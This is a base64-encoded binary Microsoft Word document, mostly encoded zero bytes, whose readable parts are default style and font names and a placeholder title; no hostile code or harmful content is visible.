AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAegBbQAtACBgRI0AAAAAAAAAAAAAAAAAAATAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAIAABAAPAQAAjcAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEhQAAAAAAnw/w8AAAE/AADkBAAA////f////3////9/////f////3////9/////f3w1RwAAAAAAMgAAAAAAAAAAAAAAAAAAAAAA//8SAAAAAAAAAAAAAAAAAAAAAwBOAFQAQQADAE4AVABBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP7/AAAFAQIAAAAAAAAAAAAAAAAAAAAAAAEAAADghZ/y+U9oEKuRCAArJ7PZMAAAAFABAAAQAAAAAQAAAIgAAAACAAAAkAAAAAMAAACcAAAABAAAAKgAAAAFAAAAtAAAAAcAAADAAAAACAAAANQAAAAJAAAA4AAAABIAAADsAAAACgAAAAwBAAAMAAAAGAEAAA0AAAAkAQAADgAAADABAAAPAAAAOAEAABAAAABAAQAAEwAAAEgBAAACAAAA5AQAAB4AAAAEAAAAAAAAAB4AAAAEAAAAAAAAAB4AAAAEAAAAQUFBAB4AAAAEAAAAAAAAAB4AAAAMAAAATm9ybWFsLmRvdAAAHgAAAAQAAABBQUEAHgAAAAQAAAAyAAAAHgAAABgAAABNaWNyb3NvZnQgT2ZmaWNlIFdvcmQAAABAAAAAAEbDIwAAAABAAAAAAOiBXTfexgFAAAAAAC5FgTfexgEDAAAAAQAAAAMAAAACAAAAAwAAABIAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD+/wAABQECAAAAAAAAAAAAAAAAAAAAAAABAAAAAtXN1ZwuGxCTlwgAKyz5rjAAAAD0AAAADAAAAAEAAABoAAAADwAAAHAAAAAFAAAAiAAAAAYAAACQAAAAEQAAAJgAAAAXAAAAoAAAAAsAAACoAAAAEAAAALAAAAATAAAAuAAAABYAAADAAAAADQAAAMgAAAAMAAAA1QAAAAIAAADkBAAAHgAAABAAAABBQUEgQUFBQUFBQSBBQUEAAwAAAAEAAAADAAAAAQAAAAMAAAATAAAAAwAAAKgZCwALAAAAAAAAAAsAAAAAAAAACwAAAAAAAAALAAAAAAAAAB4QAAABAAAAAQAAAAAMEAAAAgAAAB4AAAAGAAAAVGl0bGUAAwAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA